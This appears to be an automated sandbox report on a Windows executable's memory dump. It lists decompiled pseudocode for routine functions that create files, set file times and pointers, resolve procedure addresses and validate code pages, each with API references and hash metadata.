0x0085a95b
0x0085a95d
0x0085a9e7
0x0085a9ed
0x00000000
0x0085a9ef
0x0085a9f0
0x00000000
0x0085a9f0
0x0085a963
0x0085a96d
0x0085a972
0x0085a97a
0x0085a980
0x0085a981
0x0085a984
0x0085a9d7
0x0085a986
0x0085a986
0x0085a98a
0x0085a98d
0x0085a98f
0x0085a98f
0x0085a992
0x0085a994
0x00000000
0x00000000
0x0085a996
0x0085a999
0x0085a9a4
0x0085a9a4
0x0085a9a6
0x00000000
0x00000000
0x0085a99e
0x0085a9a3
0x0085a9a3
0x0085a9a3
0x0085a9a8
0x0085a9ab
0x0085a9ae
0x00000000
0x00000000
0x00000000
0x0085a9ae
0x0085a98f
0x0085a9b0
0x0085a9b0
0x0085a9b3
0x0085a9b8
0x0085a9b8
0x0085a9bb
0x0085a9bc
0x0085a9bc
0x0085a9bc
0x0085a9cc
0x0085a9d2
0x0085a9d2
0x0085a9dc
0x0085a9df
0x0085a9e0
0x0085a9e1
0x0085aaa5
0x0085aaa6
0x0085aaab
0x0085aaac
0x0085aaac
0x0085a95d
0x0085a94a
0x0085a938
0x0085a92c
0x00000000
0x0085aaae
0x0085aa0c
0x0085aa14
0x0085aa14
0x0085aa18
0x0085aa1b
0x0085aa21
0x0085aa24
0x0085aa24
0x0085aa27
0x0085aa29
0x0085aa2b
0x0085aa2b
0x0085aa2e
0x0085aa30
0x00000000
0x00000000
0x0085aa32
0x0085aa35
0x0085aa51
0x0085aa51
0x0085aa53
0x00000000
0x00000000
0x0085aa3a
0x0085aa40
0x0085aa42
0x0085aa48
0x0085aa4c
0x0085aa4c
0x0085aa4d
0x00000000
0x0085aa4d
0x00000000
0x0085aa40
0x0085aa55
0x0085aa58
0x0085aa5b
0x00000000
0x00000000
0x00000000
0x0085aa5b
0x0085aa5d
0x0085aa5d
0x0085aa60
0x0085aa61
0x0085aa64
0x0085aa67
0x0085aa67
0x0085aa6d
0x0085aa70
0x0085aa7f
0x0085aa88
0x0085aa8d
0x0085aa93
0x0085aa94
0x0085aa94
0x0085aa97
0x0085aa9a
0x0085aa9d
0x0085aaa0
0x0085aaa0
0x0085aaa0
0x00000000
0x0085a8f4
0x0085a8f5
0x0085a8fb
0x0085aaaf
0x0085aabe

APIs

Part of subcall function 0085A4A1: GetOEMCP.KERNEL32(00000000,?,?,0085A72A,?), ref: 0085A4CC

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0085A76F,?,00000000), ref: 0085A942
GetCPInfo.KERNEL32(00000000,0085A76F,?,?,?,0085A76F,?,00000000), ref: 0085A955

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c30fcee6b3907dbce1935cd48efd9645d38c786fd1f5897f8adce3801f8b92da
Instruction ID: 5370ff6f8b48acb1c6d643a7e862c1756a148e4ecef4e1259acb15a6c751a86e
Opcode Fuzzy Hash: c30fcee6b3907dbce1935cd48efd9645d38c786fd1f5897f8adce3801f8b92da
Instruction Fuzzy Hash: F3515570A003299ECB29CF75C4C16BABFE5FF40302F14426ED896C7241E6359949CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00831373, Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00831373(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E0084D8C4(_t56, __ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E008394D4(__ecx);
				 *((intOrPtr*)(__ecx)) = 0x8622e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00835FC6(__ecx + 0x1024, __edx, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0083C567(__ecx + 0x20e8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21d0)) = 0;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				E0083150C();
				_t62 = E0083150C();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(__ecx + 0x21bc)) = 0;
				 *(__ecx + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0084D880(__edx, __ecx, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0083ADBF(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0084E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0084E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0084E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00831373
0x00831373
0x00831373
0x00831378
0x0083137b
0x0083137d
0x00831380
0x00831387
0x00831393
0x00831396
0x008313a1
0x008313a5
0x008313b0
0x008313b6
0x008313bc
0x008313c7
0x008313cf
0x008313d3
0x008313d6
0x008313dc
0x008313e2
0x008313e4
0x00831409
0x008313e6
0x008313eb
0x008313f1
0x008313f4
0x008313fa
0x00831405
0x008313fc
0x008313fe
0x008313fe
0x008313fa
0x0083140c
0x00831418
0x0083141f
0x00831426
0x0083142f
0x0083143a
0x00831444
0x0083144a
0x00831450
0x00831456
0x0083145c
0x00831462
0x00831468
0x0083146f
0x00831475
0x0083147b
0x00831481
0x00831487
0x0083148d
0x0083149c
0x008314ab
0x008314b6
0x008314be
0x008314c4
0x008314ca
0x008314d0
0x008314d6
0x008314dc
0x008314e2
0x008314eb
0x008314f1
0x008314f7
0x008314ff
0x00831509

APIs

__EH_prolog.LIBCMT ref: 00831373

Part of subcall function 00835FC6: __EH_prolog.LIBCMT ref: 00835FCB

Part of subcall function 0083C567: __EH_prolog.LIBCMT ref: 0083C56C
Part of subcall function 0083C567: new.LIBCMT ref: 0083C5AF
Part of subcall function 0083C567: new.LIBCMT ref: 0083C5D3

new.LIBCMT ref: 008313EB

Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: afde1b15c08e87c4ef8b5eb3bddd01784597c4701f67a9f5fedd48beeec8f84d
Instruction ID: 5cb068a033ea16fbb02b12abb0f47f640fd14b755b5bd6b67f04a1e7cace0240
Opcode Fuzzy Hash: afde1b15c08e87c4ef8b5eb3bddd01784597c4701f67a9f5fedd48beeec8f84d
Instruction Fuzzy Hash: B34121B0805B449AD724CF798489AE6FBE5FB18700F404A6EE5EEC3282CB326554CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0083136E, Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0083136E(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E0084D8C4(E008611A7, __ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E008394D4(__ecx);
				 *((intOrPtr*)(__ecx)) = 0x8622e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00835FC6(__ecx + 0x1024, __edx, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0083C567(__ecx + 0x20e8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21d0)) = 0;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				E0083150C();
				_t62 = E0083150C();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(__ecx + 0x21bc)) = 0;
				 *(__ecx + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0084D880(__edx, __ecx, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0083ADBF(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0084E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0084E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0084E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x0083136e
0x0083136e
0x00831373
0x00831378
0x0083137b
0x0083137d
0x00831380
0x00831387
0x00831393
0x00831396
0x008313a1
0x008313a5
0x008313b0
0x008313b6
0x008313bc
0x008313c7
0x008313cf
0x008313d3
0x008313d6
0x008313dc
0x008313e2
0x008313e4
0x00831409
0x008313e6
0x008313eb
0x008313f1
0x008313f4
0x008313fa
0x00831405
0x008313fc
0x008313fe
0x008313fe
0x008313fa
0x0083140c
0x00831418
0x0083141f
0x00831426
0x0083142f
0x0083143a
0x00831444
0x0083144a
0x00831450
0x00831456
0x0083145c
0x00831462
0x00831468
0x0083146f
0x00831475
0x0083147b
0x00831481
0x00831487
0x0083148d
0x0083149c
0x008314ab
0x008314b6
0x008314be
0x008314c4
0x008314ca
0x008314d0
0x008314d6
0x008314dc
0x008314e2
0x008314eb
0x008314f1
0x008314f7
0x008314ff
0x00831509

APIs

__EH_prolog.LIBCMT ref: 00831373

Part of subcall function 00835FC6: __EH_prolog.LIBCMT ref: 00835FCB

Part of subcall function 0083C567: __EH_prolog.LIBCMT ref: 0083C56C
Part of subcall function 0083C567: new.LIBCMT ref: 0083C5AF
Part of subcall function 0083C567: new.LIBCMT ref: 0083C5D3

new.LIBCMT ref: 008313EB

Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ce965293da51ae94a1948573f681e719a17f1c4f47a227a709f8c87c4228b847
Instruction ID: 6a5ee24f9e0134628aecb976060a2dbfccf0b3acc53e7b3da19c853c12ea933b
Opcode Fuzzy Hash: ce965293da51ae94a1948573f681e719a17f1c4f47a227a709f8c87c4228b847
Instruction Fuzzy Hash: 524124B0805B449ED724CF7984859E6FBE5FF18700F504A6ED5EEC3282CB326554CB56

Uniqueness

Uniqueness Score: -1.00%

Function 008395C0, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008395C0(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0084D9C0();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0083B9C4(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0083B3C9(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0083FAE7(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x008395c5
0x008395cb
0x008395d8
0x008395da
0x008395e0
0x008395ee
0x008395ee
0x008395e8
0x008395e8
0x008395e8
0x008395f8
0x0083960d
0x00839616
0x0083961c
0x00839626
0x00000000
0x00839628
0x00839628
0x0083962c
0x0083962e
0x0083962e
0x00839634
0x00839634
0x00839634
0x00839638
0x00839638
0x00839648
0x0083964e
0x0083964e
0x00839655
0x00839683
0x00839683
0x00839695
0x0083969a
0x0083969d
0x008396b6

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00839C97,?,?,0083779F), ref: 00839648
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00839C97,?,?,0083779F), ref: 0083967D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 22f59ec6f43ad645882dcfd7cbd179f6ffe316c5bb67640c89718dfedceccd86
Instruction ID: 5731b8c169fc46f9cddea59d56c57456488529baddccc7cf69d2e038fdc63147
Opcode Fuzzy Hash: 22f59ec6f43ad645882dcfd7cbd179f6ffe316c5bb67640c89718dfedceccd86
Instruction Fuzzy Hash: C921F6B1505748AFD7308F18C846BA77BE8FB95764F004A2DF5E5C21D1D3B4EC498AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00839B22, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00839B22(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00840857(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E00840857(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00840857(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00839b22
0x00839b28
0x00839b31
0x00839b3c
0x00839b3c
0x00839b42
0x00839b48
0x00839b4b
0x00839b58
0x00839b54
0x00839b54
0x00839b54
0x00839b5a
0x00839b5b
0x00839b5f
0x00839b65
0x00839b72
0x00839b72
0x00839b67
0x00839b6c
0x00839b70
0x00000000
0x00000000
0x00839b70
0x00839b77
0x00839b7d
0x00839b87
0x00839b87
0x00839b8b
0x00839b92
0x00839b92
0x00839b9c
0x00839ba5
0x00839ba5
0x00839bad
0x00839bb6
0x00839bb6
0x00839bc6
0x00839bd4
0x00839be4
0x00839bec
0x00839bf8

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,0083747F,?,?,?), ref: 00839B3C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00839BEC

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 3231ba986e3a0b7a28cb5dcfae2b47564f2d99f1c7bff42ba9425a2002ef5f2a
Instruction ID: d354883fc700a5ea92b357ccec940de6d4cdadfcf4d8d58e5c955d8416e20fc2
Opcode Fuzzy Hash: 3231ba986e3a0b7a28cb5dcfae2b47564f2d99f1c7bff42ba9425a2002ef5f2a
Instruction Fuzzy Hash: C521E1311482A5ABC710DE28E881EAAFBD4FF95314F04495CF8D1C3141C365ED08DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008599EB, Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E008599EB(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x8907b8 + _a4 * 4;
				_t27 =  *0x86d668; // 0x14325215
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x86d668; // 0x14325215
							goto L13;
						}
						 *_t20 = E00852739(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00859A87( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x86d668; // 0x14325215
						goto L7;
					}
					_t27 =  *0x86d668; // 0x14325215
					goto L8;
				}
				L2:
				return _t33;
			}

0x008599f6
0x008599ff
0x00859a05
0x00859a0f
0x00859a11
0x00859a15
0x00859a80
0x00000000
0x00859a80
0x00859a19
0x00859a1f
0x00859a25
0x00859a41
0x00859a41
0x00859a43
0x00859a45
0x00859a70
0x00859a72
0x00859a7a
0x00859a7e
0x00000000
0x00859a7e
0x00859a51
0x00859a55
0x00859a6a
0x00000000
0x00859a6a
0x00859a5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00859a27
0x00859a27
0x00859a29
0x00859a31
0x00000000
0x00000000
0x00859a33
0x00859a39
0x00000000
0x00000000
0x00859a3b
0x00000000
0x00859a3b
0x00859a62
0x00000000
0x00859a62
0x00859a1b
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00859A4B
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00859A58

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 4787968acca53e59026cfb032a20245697265840d430daaf8ddc306ac9254c7f
Instruction ID: 8ba36a62110d91116da325fe6fa3e7b1dfcd1f95e8d483c57c9f126477626d9a
Opcode Fuzzy Hash: 4787968acca53e59026cfb032a20245697265840d430daaf8ddc306ac9254c7f
Instruction Fuzzy Hash: F111E737A00631DB9F23DE28EC40D5A7395FB813617174220ED56EB294E730EC45C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00839BFB, Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00839BFB() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00836EF7(0x8700e0, 0x8700e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00836EF7(0x8700e0, 0x8700e0, _t34 + 0x1e);
				goto L3;
			}

0x00839bff
0x00839c01
0x00839c0c
0x00839c1f
0x00839c1f
0x00839c31
0x00839c37
0x00839c3b
0x00839c58
0x00839c5e
0x00839c63
0x00839c65
0x00000000
0x00839c47
0x00839c4b
0x00839c74
0x00839c68
0x00000000
0x00839c68
0x00839c53
0x00000000
0x00839c53
0x00839c3b
0x00839c12
0x00000000
0x00839c70
0x00839c1a
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00839C31
GetLastError.KERNEL32 ref: 00839C3D

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: afbd4dfd083aec1f4cabd334901a0c37bf07db1777bdc9ac62780b9b8f3506c0
Instruction ID: da4c6b7be2a364030cbb3e92f1e91d76474cd27ae2bdb3c2fd99db035c4d8f74
Opcode Fuzzy Hash: afbd4dfd083aec1f4cabd334901a0c37bf07db1777bdc9ac62780b9b8f3506c0
Instruction Fuzzy Hash: 8E0196703006446BDB349E29DC84766B7D9FBC4314F15853EF192C7680DAB4DC0DC651

Uniqueness

Uniqueness Score: -1.00%

